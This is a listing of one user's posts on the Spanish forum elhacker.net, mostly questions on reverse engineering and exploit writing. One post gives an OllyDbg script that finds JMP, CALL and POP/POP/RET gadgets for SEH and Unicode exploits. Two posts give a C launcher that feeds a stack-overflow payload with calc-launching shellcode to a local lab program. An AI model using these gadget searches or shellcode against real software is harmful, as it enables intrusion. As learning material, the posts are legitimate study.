elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 39
121  Programación / Ingeniería Inversa / cmdline.hlp? en: 2 Julio 2013, 04:23 am
No logro dar con la documentación de CommandLine (OllyDbg Plugins), me he percatado que consta con muchos comandos de los cuales siempre he usado como máximo tres a ver si alguien puede compartirlo, saludos.
122  Seguridad Informática / Bugs y Exploits / Instruction finder for UNICODE Shell (OllyDbg script) en: 2 Julio 2013, 03:57 am
Hola a todos, leyendo tutoriales sobre Stack-based buffer overflow me percaté de la ausencia de alguna herramienta (bajo OllyDbg) que se encargada de encontrar direcciones funcionales para explotación bajo UNICODE, solo encontré OLLYUni pero este no encuentra instrucciones POP/POP/RET (si es así favor de informarme),
por lo que cree un script para ODBGScript capas de encontrar:
JMP r32
Call r32
POP r32/POP r32 / RETN

El script es el siguiente:
Código
  1. VAR ADDRESS
  2. VAR V_OPCODE
  3.  
  4. ASK "Select option: JMP (1) - CALL (2) - POP/POP/RET (3)"
  5. CMP $RESULT,1
  6. JE L_BEGIN_SEARCH_1
  7. CMP $RESULT,2
  8. JE L_BEGIN_SEARCH_2
  9. CMP $RESULT,3
  10. JE L_BEGIN_SEARCH_3
  11. JMP L_EXIT
  12.  
  13. L_BEGIN_SEARCH_1:
  14. FINDMEM #FFE?#
  15. L_SEARCH_JMP:
  16. TEST $RESULT,$RESULT
  17. JE L_EXIT
  18. MOV ADDRESS,$RESULT
  19. TEST ADDRESS,FF00FF00
  20. JNE L_NEXT_SEARCH_JMP
  21. MOV V_OPCODE,$RESULT
  22. INC V_OPCODE
  23. MOV V_OPCODE,[V_OPCODE],1
  24. CMP V_OPCODE,E7
  25. JA  L_NEXT_SEARCH_JMP
  26. GCI ADDRESS,COMMAND
  27. EVAL "ADDRESS:[00{ADDRESS}] - INSTRUCTION:[{$RESULT}]"
  28. LOG "",$RESULT
  29. L_NEXT_SEARCH_JMP:
  30. INC ADDRESS
  31. FINDMEM #FFE?#,ADDRESS
  32. JMP L_SEARCH_JMP
  33.  
  34. L_BEGIN_SEARCH_2:
  35. FINDMEM #FFD?#
  36. L_SEARCH_CALL:
  37. TEST $RESULT,$RESULT
  38. JE L_EXIT
  39. MOV ADDRESS,$RESULT
  40. TEST ADDRESS,FF00FF00
  41. JNE L_NEXT_SEARCH_CALL
  42. MOV V_OPCODE,$RESULT
  43. INC V_OPCODE
  44. MOV V_OPCODE,[V_OPCODE],1
  45. CMP V_OPCODE,D7
  46. JA  L_NEXT_SEARCH_CALL
  47. GCI ADDRESS,COMMAND
  48. EVAL "ADDRESS:[00{ADDRESS}] - INSTRUCTION:[{$RESULT}]"
  49. LOG "",$RESULT
  50. L_NEXT_SEARCH_CALL:
  51. INC ADDRESS
  52. FINDMEM #FFD?#,ADDRESS
  53. JMP L_SEARCH_CALL
  54.  
  55. L_BEGIN_SEARCH_3:
  56. FINDMEM #5?5?C3#
  57. L_SEARCH_POP_POP_RET:
  58. TEST $RESULT,$RESULT
  59. JE L_EXIT
  60. MOV ADDRESS,$RESULT
  61. TEST ADDRESS,FF00FF00
  62. JNE L_NEXT_SEARCH_POP_POP_RET
  63. EVAL "ADDRESS:[00{ADDRESS}] - INSTRUCTION:[POP/POP/RET]"
  64. LOG "",$RESULT
  65. L_NEXT_SEARCH_POP_POP_RET:
  66. INC ADDRESS
  67. FINDMEM #5?5?C3#,ADDRESS
  68. JMP L_SEARCH_POP_POP_RET
  69.  
  70. L_EXIT:
  71. RET

Saludos.
123  Programación / Ingeniería Inversa / Logear en campo ADDRESS con ODBGScript? en: 2 Julio 2013, 03:30 am
Hola a todos con:
LOG eip

Se logea en el campo mensaje pero el address no se muestra, ¿cómo podría hacer para logear en el campo address de LOG?, saludos.
124  Programación / Ingeniería Inversa / Obtener instrucción en EIP con OllyScript? en: 2 Julio 2013, 01:29 am
Se podrá obtener la instrucción que apunta el EIP

EJ:
403000 INC EAX

LOG INSTRUCCIÓN

MOSTRARÍA: INC EAX (En vez de los OPCODES)

Saludos.
125  Programación / Ingeniería Inversa / ¿Comenzar con IDA? en: 28 Junio 2013, 21:15 pm
Hola a todos, actualmente tengo mucho interés en comenzar a probar nuevos debugger, me ha interesado comenzar con IDA, mi pregunta es que tutorial podría darme una introducción de este debugger estilo Introducción cómo la de Ricardo Narvaja, ¿podría ser desde aquí?, me surge la duda, no quiero estudiar algo desactualizado, saludos.

http://ricardonarvaja.info/WEB/OTROS/IDA BIGUNDILLA

EDIT:

Alguna introducción de cracking en linux desde 0 utilizando IDA?.
126  Seguridad Informática / Bugs y Exploits / Duda con safeseh en: 21 Junio 2013, 04:05 am
Hola a todos, estoy comenzando con la elaboración de exploit y me he topado con el concepto de safeSEH (entiendo el funcionamiento de los manejadores de excepciones, cómo localizarlo, etc.), pero en muchos tutoriales nombran que hay que buscar módulos que posean safeSEH desactivado, pero no logro entender el funcionamiento de safeSEH, cito:

Citar
SafeSEH

En Windows XP SP2 y Windows Server 2003 se añadió la protección de memoria SafeSEH, la cual impide en gran medida la ejecución de código a través de SEH. Si esta protección se encuentra habilitada en un módulo, únicamente es posible utilizar como manejadores las direcciones almacenadas anteriormente en una lista. De este modo, no es posible sobrescribir la posición donde se encuentra “Handler_N()” ya que posteriormente se verificara si existe en la tabla indicada.

esto se refiere a que existe un estructura encargada de almacenar las direcciones que apuntan los SEH?, ¿Qué ocurre cuando se instalan nuevos SEH?, ¿esta lista se actualiza? a ver si me aclaran esta duda, ya que como  sabrán no sirve de nada conseguir los objetivos sin saber cómo funciona todo, saludos.

EDIT: Leyendo no me expliqué muy bien, mi pregunta es por que cuando necesito conseguir instrucciones POP POP RET estas deben ser conseguidas en módulos que no posean safeSEH?, si sólamente estoy tomando instrucciones, y en ningún momento estoy alterando los SEH del módulo?
127  Programación / Programación C/C++ / crear arreglo con distintos tipos de datos? en: 18 Junio 2013, 01:14 am
Hola a todos estoy haciendo una shellcode:

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. void main(int argc, char *argv[]) {
  6. char relleno[1024] ="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  7. char offset[]  = "\xED\x1E\x95\x7C";
  8. char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
  9.  
  10. strcat(relleno,offset);
  11. strcat(relleno,exploit);
  12.  
  13. argv[0] = "vuln1";
  14.    argv[1] = relleno;
  15.    argv[2] = NULL;
  16.  
  17. execv ("vuln.exe",argv);
  18.  
  19. }

Esta funciona de maravilla, lo que si me surge una duda con respecto a execv, cómo se puede apreciar se le envían los parámetros de argv (estos se asignan con anterioridad), pero me surge la duda de cómo podría crear mi propio arreglo con distintos tipos de datos como lo es en argv para posteriormente entregárselo a execv, saludos.
128  Programación / Programación C/C++ / Problema con código en C en: 18 Junio 2013, 00:50 am
Hola a todos estoy intentando programar mis propias shellcode:

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. void main(int argc, char *argv[]) {
  6. char relleno[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  7. char offset[]  = "\xED\x1E\x95\x7C";
  8. char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65"
  9. "\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
  10.  
  11. strcat(offset,exploit);
  12. strcat(relleno,offset);
  13.  
  14. //argv[0] = "vuln1";
  15.    //argv[1] = relleno;
  16.    //argv[2] = NULL;
  17.  
  18. //execv ("vuln.exe",argv);
  19.  
  20. }

El problema está en la segunda concatenación, esta genera errores al momento de ejecutar, ¿cual podría ser el problema?, saludos y gracias.
129  Programación / Programación General / Cómo darle un identificador a un item (listview) en: 17 Mayo 2013, 20:59 pm
Hola a todos necesito asignar un identificador a cada item de un listview ya que quiero  que el programa los pueda identificar y diferenciar, ¿cómo podría hacerlo?, saludos.
130  Programación / ASM / Identificador para item de listview en: 17 Mayo 2013, 18:03 pm
Hola a todos, estoy teniendo un problema al querer identificar un item de un listview:
mi idea es entregarle un "identificador" único a cada item del listview, como identificador utilizo iItem, pero al parecer este se altera al momento de eliminar un item de la lista.

Mi duda es ¿como podría identificar a un item?, no me sirve hacerle dos clic
Código
  1. invoke SendMessage,hlsv,LVM_GETNEXTITEM,-1,LVNI_FOCUSED

Necesito un identificar único y que este no varíe de acuerdo a la posición del item, saludos.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 39
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines